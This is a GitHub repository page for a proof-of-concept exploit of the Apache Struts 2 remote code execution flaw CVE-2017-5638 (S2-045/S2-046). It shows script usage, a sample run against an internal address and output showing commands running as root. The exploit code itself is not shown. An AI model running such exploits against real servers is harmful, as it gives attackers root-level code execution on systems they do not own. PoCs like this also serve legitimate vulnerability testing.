Skip to content

S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)

Notifications You must be signed in to change notification settings

KarzsGHR/S2-046_S2-045_POC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
 
 
 
 
 
 

Repository files navigation

S2-046_POC

Usage:

./s2_046.sh [url]
./s2_045.sh [url]

Sample:

  1. chmod +x ./s2_046.sh
  2. ./s2_046.sh http://172.16.152.135/index.action

OUTPUT:

================HTTP GET Method================
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
================HTTP POST Method================
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023

About

S2-046|S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages